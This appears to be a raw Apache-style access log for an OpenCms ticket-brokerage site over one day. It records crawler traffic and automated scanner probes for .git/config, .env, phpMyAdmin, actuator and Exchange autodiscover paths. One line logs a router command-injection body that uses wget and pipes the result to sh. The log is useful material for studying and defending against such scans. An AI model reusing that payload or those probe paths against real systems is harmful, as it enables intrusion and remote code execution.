40.77.167.44 - - [02/Jan/2024:06:05:48 +0100] "GET /ticket2/opencms/sv/buy/?comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=061607E6-22B7-6FFA-03FD-A4B8B13A943F HTTP/1.1" 200 74784
94.102.61.75 - - [02/Jan/2024:06:06:29 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 -
94.102.61.75 - - [02/Jan/2024:06:06:33 +0100] "GET /ticket2/opencms/en/ HTTP/1.1" 200 67141
185.246.208.110 - - [02/Jan/2024:06:16:33 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 -
175.111.182.234 - - [02/Jan/2024:06:19:11 +0100] "GET / HTTP/1.1" 404 -
10.140.0.43 - - [02/Jan/2024:06:21:30 +0100] "GET / HTTP/1.1" 404 -
162.243.137.41 - - [02/Jan/2024:06:24:30 +0100] "GET /ticket2/opencms/autodiscover/autodiscover.json?@zdi/Powershell HTTP/1.1" 404 -
104.243.37.151 - - [02/Jan/2024:06:31:07 +0100] "GET /ticket2/opencms/web-interactives-embed.js HTTP/1.1" 404 -
185.246.208.110 - - [02/Jan/2024:06:37:25 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 -
35.203.210.47 - - [02/Jan/2024:06:41:13 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 -
35.203.210.47 - - [02/Jan/2024:06:41:14 +0100] "GET /ticket2/opencms/en/ HTTP/1.1" 200 67141
185.246.208.110 - - [02/Jan/2024:06:58:19 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 -
104.243.37.151 - - [02/Jan/2024:07:09:19 +0100] "GET /ticket2/opencms/f/1ba1685.js HTTP/1.1" 404 -
185.246.208.110 - - [02/Jan/2024:07:19:04 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 -
159.89.164.29 - - [02/Jan/2024:07:25:48 +0100] "GET / HTTP/1.1" 404 -
185.246.208.110 - - [02/Jan/2024:07:39:43 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 -
185.194.176.49 - - [02/Jan/2024:07:47:02 +0100] "GET / HTTP/1.1" 404 -
45.128.232.152 - - [02/Jan/2024:07:47:11 +0100] "CONNECT google.com:443 HTTP/1.1" 400 -
104.243.37.151 - - [02/Jan/2024:07:47:20 +0100] "GET /ticket2/opencms/design/defaulttheme/js/widgetv2/index.js HTTP/1.1" 404 -
185.246.208.110 - - [02/Jan/2024:08:00:18 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 -
167.94.138.124 - - [02/Jan/2024:08:13:26 +0100] "GET / HTTP/1.1" 404 -
167.94.138.124 - - [02/Jan/2024:08:13:29 +0100] "GET / HTTP/1.1" 404 -
167.94.138.124 - - [02/Jan/2024:08:13:29 +0100] "PRI * HTTP/2.0" 505 -
185.246.208.110 - - [02/Jan/2024:08:20:51 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 -
66.249.66.136 - - [02/Jan/2024:08:21:47 +0100] "GET /ticket2/opencms/en/venue/?venueid=C38732EA-BD5E-1623-DC42-554FD22C8388 HTTP/1.1" 200 63102
104.243.37.151 - - [02/Jan/2024:08:25:10 +0100] "GET /ticket2/opencms/14565770.js HTTP/1.1" 404 -
45.128.232.91 - - [02/Jan/2024:08:30:55 +0100] "GET / HTTP/1.1" 404 -
216.218.206.116 - - [02/Jan/2024:08:34:49 +0100] "GET / HTTP/1.1" 404 -
216.218.206.124 - - [02/Jan/2024:08:35:28 +0100] "GET /favicon.ico HTTP/1.1" 404 -
216.218.206.88 - - [02/Jan/2024:08:36:04 +0100] "GET /?format=json HTTP/1.1" 404 -
216.218.206.76 - - [02/Jan/2024:08:36:29 +0100] "CONNECT www.shadowserver.org:443 HTTP/1.1" 400 -
87.236.176.221 - - [02/Jan/2024:08:42:21 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 -
87.236.176.221 - - [02/Jan/2024:08:42:22 +0100] "GET /ticket2/opencms/en/ HTTP/1.1" 200 67141
87.236.176.22 - - [02/Jan/2024:08:42:23 +0100] "GET /ticket2/opencms/favicon.ico HTTP/1.1" 200 1406
66.249.66.137 - - [02/Jan/2024:08:56:24 +0100] "GET /ticket2/opencms/en/venue/?venueid=DF37D396-FA06-F473-CD27-6AD0A828AD06 HTTP/1.1" 200 63128
104.243.37.151 - - [02/Jan/2024:09:04:32 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 -
185.246.208.110 - - [02/Jan/2024:09:29:49 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 -
66.249.66.136 - - [02/Jan/2024:09:31:01 +0100] "GET /ticket2/opencms/en/venue/?countryid=6A314B5B-08FE-5CDE-C85D-253064810CDA HTTP/1.1" 200 92505
104.243.37.151 - - [02/Jan/2024:09:43:49 +0100] "GET /ticket2/opencms/assets/index-19d4ecc1.js HTTP/1.1" 404 -
66.249.66.137 - - [02/Jan/2024:10:05:37 +0100] "GET /ticket2/opencms/robots.txt HTTP/1.1" 200 773
66.249.66.137 - - [02/Jan/2024:10:05:38 +0100] "GET /ticket2/opencms/en/venue/?venueid=C8425D67-5AD6-9381-B10D-8009E1B47C0D HTTP/1.1" 200 63108
1.234.41.218 - - [02/Jan/2024:10:20:36 +0100] "GET /docs/tomcat.jsp HTTP/1.1" 404 -
1.234.41.218 - - [02/Jan/2024:10:20:40 +0100] "GET /tomcat.jsp HTTP/1.1" 404 -
1.234.41.218 - - [02/Jan/2024:10:20:40 +0100] "GET /tomcat.jsp HTTP/1.1" 404 -
104.243.37.151 - - [02/Jan/2024:10:22:10 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 -
66.249.66.137 - - [02/Jan/2024:10:40:15 +0100] "GET /ticket2/opencms/en/venue/?countryid=6E625517-1E9A-024B-7EBB-F569FEDEE88E HTTP/1.1" 200 92505
5.167.60.153 - - [02/Jan/2024:10:44:14 +0100] "POST /goform/set_LimitClient_cfg HTTP/1.1" 400 -
104.243.37.151 - - [02/Jan/2024:11:01:35 +0100] "GET /ticket2/opencms/@lottiefiles/lottie-player@2.0.2/dist/lottie-player.js HTTP/1.1" 404 -
46.174.191.32 - - [02/Jan/2024:11:02:26 +0100] "GET / HTTP/1.0" 404 -
165.232.177.124 - - [02/Jan/2024:11:03:04 +0100] "CONNECT google.com:443 HTTP/1.1" 400 -
66.249.66.138 - - [02/Jan/2024:11:14:52 +0100] "GET /ticket2/opencms/en/venue/?venueid=605DA297-0563-4D5B-80C8-29136936D7A1 HTTP/1.1" 200 63093
38.222.16.97 - - [02/Jan/2024:11:14:55 +0100] "POST /goform/set_LimitClient_cfg HTTP/1.1" 400 -
185.246.208.110 - - [02/Jan/2024:11:15:56 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 -
66.249.66.136 - - [02/Jan/2024:11:20:54 +0100] "GET /ticket2/opencms/en/venue/?venueid=A7C35E41-A8DE-46DC-9A98-EA794BBC27B7 HTTP/1.1" 200 63093
66.249.66.137 - - [02/Jan/2024:11:22:52 +0100] "GET /ticket2/opencms/en/venue/?countryid=CEA98181-AF32-4AD7-7F85-B2BF5D143D52 HTTP/1.1" 200 92505
66.249.66.138 - - [02/Jan/2024:11:22:53 +0100] "GET /ticket2/opencms/en/venue/?venueid=D6F2B52F-C215-0A5B-8206-F685BCC6BD43 HTTP/1.1" 200 63159
66.240.236.109 - - [02/Jan/2024:11:36:22 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 -
64.62.197.68 - - [02/Jan/2024:11:37:57 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 -
45.128.232.152 - - [02/Jan/2024:11:40:22 +0100] "CONNECT google.com:443 HTTP/1.1" 400 -
104.243.37.151 - - [02/Jan/2024:11:40:56 +0100] "GET /ticket2/opencms/_s/v4/app/6579dd43930/js/twk-main.js HTTP/1.1" 404 -
185.246.208.110 - - [02/Jan/2024:11:42:43 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 -
64.62.197.76 - - [02/Jan/2024:11:44:59 +0100] "GET /ticket2/opencms/favicon.ico HTTP/1.1" 200 1406
64.62.197.63 - - [02/Jan/2024:11:46:59 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 -
64.62.197.74 - - [02/Jan/2024:11:48:55 +0100] "GET /ticket2/opencms/geoserver/web/ HTTP/1.1" 404 -
66.249.66.138 - - [02/Jan/2024:11:49:29 +0100] "GET /ticket2/opencms/en/venue/?venueid=70CF0C71-242F-3CB8-3E8B-757E40B6417C HTTP/1.1" 200 63185
66.249.66.137 - - [02/Jan/2024:11:57:29 +0100] "GET /ticket2/opencms/en/venue/?venueid=00355748-2F14-5C42-41A1-1802A30CF178 HTTP/1.1" 200 63179
54.91.207.241 - - [02/Jan/2024:12:07:29 +0100] "GET /ticket2/opencms/core/.git/config HTTP/1.1" 404 -
185.246.208.110 - - [02/Jan/2024:12:09:05 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 -
162.243.147.16 - - [01/Jan/1970:00:59:59 +0100] "-" 400 -
38.222.101.237 - - [02/Jan/2024:12:12:31 +0100] "POST /goform/set_LimitClient_cfg HTTP/1.1" 400 -
104.243.37.151 - - [02/Jan/2024:12:20:18 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 -
52.167.144.137 - - [02/Jan/2024:12:24:23 +0100] "GET /ticket2/opencms/en/venue/?venueid=555014B0-08D8-515D-B9A4-B900DC7639D7 HTTP/1.1" 200 63104
185.246.208.110 - - [02/Jan/2024:12:35:20 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 -
104.131.186.23 - - [02/Jan/2024:12:40:35 +0100] "GET /ticket2/opencms/.git/config HTTP/1.1" 404 -
66.249.66.138 - - [02/Jan/2024:12:53:00 +0100] "GET /ticket2/opencms/en/venue/?countryid=DB82417F-35E8-BF3C-287A-21ECAFBB9DD1 HTTP/1.1" 200 92505
66.249.66.138 - - [02/Jan/2024:12:58:43 +0100] "GET /ticket2/opencms/en/venue/?venueid=02879B20-696D-6457-CB7D-0E942DB3F5CA HTTP/1.1" 200 63107
104.243.37.151 - - [02/Jan/2024:12:59:47 +0100] "GET /ticket2/opencms/logger-1.min.js HTTP/1.1" 404 -
185.246.208.110 - - [02/Jan/2024:13:01:24 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 -
185.246.208.110 - - [02/Jan/2024:13:27:13 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 -
66.249.66.138 - - [02/Jan/2024:13:27:37 +0100] "GET /ticket2/opencms/en/venue/?venueid=9DA8A4B3-4A97-FBB2-EFB7-185E7CEA4A49 HTTP/1.1" 200 63111
104.243.37.151 - - [02/Jan/2024:13:38:28 +0100] "GET /ticket2/opencms/jquery.marquee/1.4.0/jquery.marquee.min.js HTTP/1.1" 404 -
167.94.146.53 - - [02/Jan/2024:13:43:54 +0100] "GET / HTTP/1.1" 404 -
167.94.146.53 - - [02/Jan/2024:13:43:57 +0100] "GET / HTTP/1.1" 404 -
167.94.146.53 - - [02/Jan/2024:13:43:57 +0100] "PRI * HTTP/2.0" 505 -
198.23.172.109 - - [02/Jan/2024:13:46:11 +0100] "GET / HTTP/1.1" 404 -
185.246.208.110 - - [02/Jan/2024:13:52:59 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 -
66.249.66.138 - - [02/Jan/2024:14:02:14 +0100] "GET /ticket2/opencms/en/venue/?venueid=BD822697-3740-82B9-1A6D-F3495CC47DAB HTTP/1.1" 200 63093
66.249.66.136 - - [02/Jan/2024:14:07:55 +0100] "GET /ticket2/opencms/en/venue/?venueid=F7C7B813-65CC-75A1-88FA-A5B025A08445 HTTP/1.1" 200 63116
104.243.37.151 - - [02/Jan/2024:14:18:08 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 -
185.246.208.110 - - [02/Jan/2024:14:18:41 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 -
66.249.66.137 - - [02/Jan/2024:14:36:51 +0100] "GET /ticket2/opencms/en/venue/?venueid=D32D7D15-39F6-AD54-233F-8A09600A4A49 HTTP/1.1" 200 63177
104.243.37.151 - - [02/Jan/2024:14:57:56 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 -
40.77.167.16 - - [02/Jan/2024:15:00:19 +0100] "GET /ticket2/opencms/en/venue/?venueid=644AC771-2186-260E-75E7-7F6B39C5B86B HTTP/1.1" 200 63150
66.249.66.138 - - [02/Jan/2024:15:01:56 +0100] "GET /ticket2/opencms/en/venue/?venueid=774CE0C8-BD49-BECE-B867-F0D360E1A586 HTTP/1.1" 200 63098
66.249.66.137 - - [02/Jan/2024:15:01:57 +0100] "GET /ticket2/opencms/en/venue/?countryid=A41A8692-50A8-E04F-AB0B-A9766CB2286D HTTP/1.1" 200 92505
66.249.66.137 - - [02/Jan/2024:15:02:00 +0100] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/common-ajax.js HTTP/1.1" 200 20175
83.97.73.245 - - [02/Jan/2024:15:02:29 +0100] "GET /ticket2/opencms/?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 302 -
83.97.73.245 - - [02/Jan/2024:15:02:35 +0100] "GET /ticket2/opencms/en/ HTTP/1.1" 200 67141
66.249.66.138 - - [02/Jan/2024:15:05:54 +0100] "GET /ticket2/opencms/en/venue/?venueid=A0B35C83-269D-8EEE-39B8-9C45CBF0DD7B HTTP/1.1" 200 63131
66.249.66.138 - - [02/Jan/2024:15:07:52 +0100] "GET /ticket2/opencms/en/venue/?venueid=2461643D-69F1-C18F-F693-9168E791270F HTTP/1.1" 200 63155
66.249.66.136 - - [02/Jan/2024:15:09:53 +0100] "GET /ticket2/opencms/en/venue/?venueid=E472D4FD-D5DF-5700-717C-3F4C29267654 HTTP/1.1" 200 63140
85.227.85.29 - - [02/Jan/2024:15:16:55 +0100] "POST /cgi-bin/luci/;stok=/locate?form=country HTTP/1.1" 404 -
85.227.85.29 - - [02/Jan/2024:15:16:55 +0100] "operation=write&country=$(id>`wget /omega -O-|sh`)" 505 -
45.79.181.104 - - [02/Jan/2024:15:20:17 +0100] "GET / HTTP/1.1" 404 -
66.249.66.136 - - [02/Jan/2024:15:26:12 +0100] "GET /ticket2/opencms/en/venue/?countryid=C20C79E6-EE6B-26D5-6506-E0F6BF6B710A HTTP/1.1" 200 93910
66.249.66.136 - - [02/Jan/2024:15:29:28 +0100] "GET /ticket2/opencms/en/venue/?venueid=8B6C824C-D02D-D12B-5DBC-51731218C202 HTTP/1.1" 200 63122
104.243.37.151 - - [02/Jan/2024:15:37:44 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 -
66.249.66.138 - - [02/Jan/2024:15:39:26 +0100] "GET /ticket2/opencms/sv/sport/fotbollsbiljetter/eredivisie/hollandska-ligan/ HTTP/1.1" 200 70326
185.246.208.110 - - [02/Jan/2024:15:48:11 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 -
66.249.66.138 - - [02/Jan/2024:15:49:01 +0100] "GET /ticket2/opencms/en/venue/?venueid=4D10F6C7-6483-15E8-A9F8-BBF15C7E14A8 HTTP/1.1" 200 63125
54.91.207.241 - - [02/Jan/2024:15:50:50 +0100] "GET /ticket2/opencms/api/.git/config HTTP/1.1" 404 -
45.79.181.104 - - [02/Jan/2024:16:00:03 +0100] "GET / HTTP/1.1" 404 -
84.54.51.33 - - [02/Jan/2024:16:04:52 +0100] "CONNECT google.com:443 HTTP/1.1" 400 -
66.249.66.136 - - [02/Jan/2024:16:05:19 +0100] "GET /ticket2/opencms/en/venue/?countryid=C3419397-8D1B-9427-953E-96370A3C8B07 HTTP/1.1" 200 92505
45.79.181.104 - - [02/Jan/2024:16:09:59 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 -
47.128.249.71 - - [02/Jan/2024:16:17:00 +0100] "GET /ticket2/opencms/.env HTTP/1.1" 404 -
47.128.249.71 - - [02/Jan/2024:16:17:02 +0100] "POST /ticket2/opencms/ HTTP/1.1" 302 -
104.243.37.151 - - [02/Jan/2024:16:17:45 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 -
66.249.66.136 - - [02/Jan/2024:16:17:51 +0100] "GET /ticket2/opencms/en/venue/?venueid=08E4EC60-00C9-C497-9F21-DF811FAE4DEC HTTP/1.1" 200 63128
134.122.9.186 - - [02/Jan/2024:16:32:22 +0100] "GET / HTTP/1.1" 404 -
66.249.66.138 - - [02/Jan/2024:16:37:22 +0100] "GET /ticket2/opencms/sv/sport/fotbollsbiljetter/bundesliga/audi-cup.html?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=E961462E-5AC2-64D6-5850-A310C9DEAA06 HTTP/1.1" 200 65962
66.249.66.137 - - [02/Jan/2024:16:37:28 +0100] "GET /ticket2/opencms/sv/buy/?page=1&edid=0122F2A3-A1B3-8248-9299-6A14904F0774 HTTP/1.1" 200 77556
66.249.66.136 - - [02/Jan/2024:16:37:29 +0100] "GET /ticket2/opencms/en/venue/?venueid=7D020229-2D1C-A8BA-5380-67981FACE9A7 HTTP/1.1" 200 63086
66.249.66.137 - - [02/Jan/2024:16:37:29 +0100] "GET /ticket2/opencms/en/venue/?venueid=09020355-FC21-7B01-28CB-650A5D998DEC HTTP/1.1" 200 63125
66.249.66.136 - - [02/Jan/2024:16:37:42 +0100] "GET /ticket2/opencms/en/venue/?venueid=6F3CA280-5893-C28B-8C76-4FA561BAFBF2 HTTP/1.1" 200 63092
66.249.66.136 - - [02/Jan/2024:16:37:43 +0100] "GET /ticket2/opencms/en/venue/?venueid=18CB81B4-8EA7-CAF4-AF24-168C4E2476BF HTTP/1.1" 200 63113
2.58.95.68 - - [02/Jan/2024:16:40:02 +0100] "CONNECT google.com:443 HTTP/1.1" 400 -
66.249.66.137 - - [02/Jan/2024:16:44:28 +0100] "GET /ticket2/opencms/en/venue/?venueid=A9B88B80-1A43-E772-7C63-4544ED8DA305 HTTP/1.1" 200 63182
185.180.143.147 - - [02/Jan/2024:16:47:13 +0100] "GET / HTTP/1.1" 404 -
66.249.66.138 - - [02/Jan/2024:16:54:56 +0100] "GET /ticket2/opencms/en/venue/?venueid=2093F44A-5602-34FE-CA0A-0A611F93B4B6 HTTP/1.1" 200 63069
66.249.66.138 - - [02/Jan/2024:16:55:53 +0100] "GET /ticket2/opencms/en/venue/?venueid=40BC3D00-46E6-20A0-5D8C-1C84088AAF36 HTTP/1.1" 200 63087
66.249.66.137 - - [02/Jan/2024:16:56:58 +0100] "GET /ticket2/opencms/en/venue/?venueid=A6CB083A-5A62-D00D-1160-926B40FC19E8 HTTP/1.1" 200 63102
104.243.37.151 - - [02/Jan/2024:16:58:04 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 -
205.210.31.254 - - [02/Jan/2024:17:06:35 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 -
91.92.252.45 - - [02/Jan/2024:17:10:05 +0100] "CONNECT google.com:443 HTTP/1.1" 400 -
31.220.88.155 - - [02/Jan/2024:17:19:46 +0100] "GET /ticket2/opencms/admin/config.php HTTP/1.0" 404 -
66.249.66.138 - - [02/Jan/2024:17:23:36 +0100] "GET /ticket2/opencms/en/venue/?countryid=666C887D-F998-338F-2ABE-16022B884D9D HTTP/1.1" 200 92505
66.249.66.137 - - [02/Jan/2024:17:32:27 +0100] "GET /ticket2/opencms/en/venue/?venueid=780F530C-1E5B-A040-B582-92C140F93856 HTTP/1.1" 200 63147
54.91.207.241 - - [02/Jan/2024:17:33:12 +0100] "GET /ticket2/opencms/lib/.git/config HTTP/1.1" 404 -
66.249.66.138 - - [02/Jan/2024:17:33:22 +0100] "GET /ticket2/opencms/sv/sport/fotbollsbiljetter/la_liga/malaga/ HTTP/1.1" 200 64918
66.249.66.137 - - [02/Jan/2024:17:36:07 +0100] "GET /ticket2/opencms/en/venue/?venueid=678131D6-267B-A67E-3FCF-710EEFB21484 HTTP/1.1" 200 63122
104.243.37.151 - - [02/Jan/2024:17:38:28 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 -
66.249.66.138 - - [02/Jan/2024:18:02:43 +0100] "GET /ticket2/opencms/sv/buy/?page=6&column= HTTP/1.1" 200 64875
66.249.66.138 - - [02/Jan/2024:18:09:56 +0100] "GET /ticket2/opencms/en/venue/?venueid=8D217A69-8B46-AC3D-8655-CBEED67203A8 HTTP/1.1" 200 63150
104.243.37.151 - - [02/Jan/2024:18:18:20 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 -
66.249.66.137 - - [02/Jan/2024:18:41:52 +0100] "GET /ticket2/opencms/en/venue/?venueid=C38732EA-BD5E-1623-DC42-554FD22C8388 HTTP/1.1" 200 63102
78.153.140.219 - - [02/Jan/2024:18:47:12 +0100] "GET /ticket2/opencms/.env HTTP/1.1" 404 -
66.249.66.137 - - [02/Jan/2024:18:47:26 +0100] "GET /ticket2/opencms/en/venue/?venueid=59A74FAD-E57E-D9BE-F92A-FE2D529CC098 HTTP/1.1" 200 63090
54.91.207.241 - - [02/Jan/2024:18:48:56 +0100] "GET /ticket2/opencms/modules/.git/config HTTP/1.1" 404 -
66.249.66.138 - - [02/Jan/2024:18:52:59 +0100] "GET /ticket2/opencms/en/venue/?venueid=22A38509-349B-CEBC-EA2F-719FED9069C4 HTTP/1.1" 200 63128
66.249.66.138 - - [02/Jan/2024:18:53:00 +0100] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/jquery-ui.css HTTP/1.1" 200 33221
66.249.66.136 - - [02/Jan/2024:18:53:02 +0100] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/calendar.css HTTP/1.1" 200 6871
104.243.37.151 - - [02/Jan/2024:18:57:26 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 -
66.249.66.137 - - [02/Jan/2024:19:26:08 +0100] "GET /ticket2/opencms/robots.txt HTTP/1.1" 200 773
104.243.37.151 - - [02/Jan/2024:19:37:29 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 -
185.246.208.110 - - [02/Jan/2024:19:44:14 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 -
66.249.66.136 - - [02/Jan/2024:19:51:05 +0100] "GET /ticket2/opencms/sv/buy/?page=6&comcatid=810BB404-4103-77F2-A6C2-12D5E6C338E2 HTTP/1.1" 200 65936
222.121.250.116 - - [02/Jan/2024:19:54:45 +0100] "GET /phpMyAdmin/scripts/setup.php HTTP/1.0" 404 -
222.121.250.116 - - [02/Jan/2024:19:54:46 +0100] "GET /phpmyadmin/scripts/setup.php HTTP/1.0" 404 -
222.121.250.116 - - [02/Jan/2024:19:54:47 +0100] "GET /phpMyAdmin-2.11.4/scripts/setup.php HTTP/1.0" 404 -
222.121.250.116 - - [02/Jan/2024:19:54:47 +0100] "GET /phpMyAdmin-2.11.3/scripts/setup.php HTTP/1.0" 404 -
222.121.250.116 - - [02/Jan/2024:19:54:48 +0100] "GET /phpMyAdmin-2.10.0.2/scripts/setup.php HTTP/1.0" 404 -
222.121.250.116 - - [02/Jan/2024:19:54:48 +0100] "GET /phpMyAdmin-2.10.3/scripts/setup.php HTTP/1.0" 404 -
222.121.250.116 - - [02/Jan/2024:19:54:49 +0100] "GET /phpMyAdmin-2.8.0.2/scripts/setup.php HTTP/1.0" 404 -
222.121.250.116 - - [02/Jan/2024:19:54:50 +0100] "GET /phpMyAdmin-2.10.2/scripts/setup.php HTTP/1.0" 404 -
222.121.250.116 - - [02/Jan/2024:19:54:50 +0100] "GET /phpMyAdmin-2.11.9.2/scripts/setup.php HTTP/1.0" 404 -
222.121.250.116 - - [02/Jan/2024:19:54:51 +0100] "GET /phpMyAdmin-2.11.0/scripts/setup.php HTTP/1.0" 404 -
222.121.250.116 - - [02/Jan/2024:19:54:51 +0100] "GET /phpMyAdmin-2.11.7/scripts/setup.php HTTP/1.0" 404 -
222.121.250.116 - - [02/Jan/2024:19:54:52 +0100] "GET /phpMyAdmin-2.11.1.2/scripts/setup.php HTTP/1.0" 404 -
222.121.250.116 - - [02/Jan/2024:19:54:53 +0100] "GET /pma/scripts/setup.php HTTP/1.0" 404 -
222.121.250.116 - - [02/Jan/2024:19:54:53 +0100] "GET /phpMyAdmin3/scripts/setup.php HTTP/1.0" 404 -
83.97.73.245 - - [02/Jan/2024:19:57:41 +0100] "GET /ticket2/opencms/actuator/gateway/routes HTTP/1.1" 404 -
192.241.231.52 - - [02/Jan/2024:19:59:21 +0100] "GET /ticket2/opencms/actuator/health HTTP/1.1" 404 -
157.55.39.61 - - [02/Jan/2024:20:00:56 +0100] "GET /ticket2/opencms/sitemap.xml HTTP/1.1" 200 37572
54.91.207.241 - - [02/Jan/2024:20:13:11 +0100] "GET /ticket2/opencms/includes/.git/config HTTP/1.1" 404 -
104.243.37.151 - - [02/Jan/2024:20:17:41 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 -
106.75.128.217 - - [02/Jan/2024:20:18:01 +0100] "GET /ticket2/opencms/iKeC HTTP/1.1" 404 -
106.75.128.217 - - [02/Jan/2024:20:18:04 +0100] "GET /ticket2/opencms/8kuE HTTP/1.1" 404 -
172.104.11.4 - - [01/Jan/1970:00:59:59 +0100] "-" 400 -
54.91.207.241 - - [02/Jan/2024:20:38:19 +0100] "GET /ticket2/opencms/config/.git/config HTTP/1.1" 404 -
40.77.167.53 - - [02/Jan/2024:20:51:16 +0100] "GET /ticket2/opencms/en/venue/?countryid=A758EE03-9751-87FA-5392-033D41724B17 HTTP/1.1" 200 92505
198.199.115.31 - - [02/Jan/2024:20:54:42 +0100] "GET /actuator/health HTTP/1.1" 404 -
104.243.37.151 - - [02/Jan/2024:20:58:05 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 -
66.249.66.138 - - [02/Jan/2024:21:00:19 +0100] "GET /ticket2/opencms/en/venue/?countryid=3255DA3D-476B-211A-8F09-81C55CABEF03 HTTP/1.1" 200 92505
103.187.190.95 - - [02/Jan/2024:21:09:18 +0100] "GET /ticket2/opencms/ HTTP/1.0" 500 -
103.187.190.95 - - [02/Jan/2024:21:09:19 +0100] "OPTIONS /ticket2/opencms/ HTTP/1.0" 200 -
103.187.190.95 - - [02/Jan/2024:21:09:20 +0100] "GET /ticket2/opencms/nmaplowercheck1704226590 HTTP/1.1" 404 -
103.187.190.95 - - [02/Jan/2024:21:09:20 +0100] "POST /ticket2/opencms/sdk HTTP/1.1" 404 -
103.187.190.95 - - [02/Jan/2024:21:09:20 +0100] "GET /ticket2/opencms/evox/about HTTP/1.1" 404 -
103.187.190.95 - - [02/Jan/2024:21:09:20 +0100] "GET /ticket2/opencms/HNAP1 HTTP/1.1" 404 -
103.187.190.95 - - [02/Jan/2024:21:09:21 +0100] "GET /ticket2/opencms/ HTTP/1.0" 500 -
103.187.190.95 - - [02/Jan/2024:21:09:22 +0100] "GET /ticket2/opencms/ HTTP/1.1" 500 -
103.187.190.5 - - [02/Jan/2024:21:09:23 +0100] "POST /ticket2/opencms/ HTTP/1.1" 302 -
103.187.190.131 - - [02/Jan/2024:21:09:23 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 -
103.187.190.131 - - [02/Jan/2024:21:09:24 +0100] "GET /ticket2/opencms/en/ HTTP/1.1" 200 67141
103.187.190.5 - - [02/Jan/2024:21:09:24 +0100] "GET /ticket2/opencms/sv/declined/ HTTP/1.1" 200 63744
103.187.190.131 - - [02/Jan/2024:21:09:25 +0100] "GET /ticket2/opencms/favicon.ico HTTP/1.1" 200 1406
198.74.56.46 - - [02/Jan/2024:21:13:03 +0100] "GET / HTTP/1.1" 404 -
104.131.186.23 - - [02/Jan/2024:21:14:14 +0100] "GET /ticket2/opencms/.git/config HTTP/1.1" 404 -
162.142.125.224 - - [02/Jan/2024:21:30:11 +0100] "GET /ticket2/opencms/ HTTP/1.1" 500 -
162.142.125.224 - - [02/Jan/2024:21:30:15 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 -
162.142.125.224 - - [02/Jan/2024:21:30:25 +0100] "GET /ticket2/opencms/en HTTP/1.1" 200 67141
162.142.125.224 - - [02/Jan/2024:21:30:28 +0100] "GET /ticket2/opencms/favicon.ico HTTP/1.1" 200 1406
107.170.234.30 - - [02/Jan/2024:21:36:00 +0100] "GET /ticket2/opencms/version HTTP/1.1" 404 -
104.243.37.151 - - [02/Jan/2024:21:37:40 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 -
83.97.73.245 - - [02/Jan/2024:21:40:32 +0100] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 404 -
198.199.111.205 - - [02/Jan/2024:21:46:11 +0100] "GET /hudson HTTP/1.1" 404 -
94.102.61.75 - - [02/Jan/2024:21:51:53 +0100] "GET /ticket2/opencms/favicon.ico HTTP/1.1" 200 1406
94.102.61.75 - - [02/Jan/2024:21:51:53 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 -
94.102.61.75 - - [02/Jan/2024:21:51:53 +0100] "GET /ticket2/opencms/en/ HTTP/1.1" 200 67141
66.249.66.137 - - [02/Jan/2024:22:00:01 +0100] "GET /ticket2/opencms/fr/sport/fotbollsbiljetter/serie_a/fiorentina/brescia.html HTTP/1.1" 500 -
163.47.147.102 - - [02/Jan/2024:22:02:01 +0100] "GET / HTTP/1.1" 404 -
94.102.61.75 - - [02/Jan/2024:22:03:43 +0100] "GET /ticket2/opencms/favicon.ico HTTP/1.1" 200 1406
94.102.61.75 - - [02/Jan/2024:22:03:43 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 -
94.102.61.75 - - [02/Jan/2024:22:03:44 +0100] "GET /ticket2/opencms/en/ HTTP/1.1" 200 67141
84.54.51.33 - - [02/Jan/2024:22:05:38 +0100] "CONNECT google.com:443 HTTP/1.1" 400 -
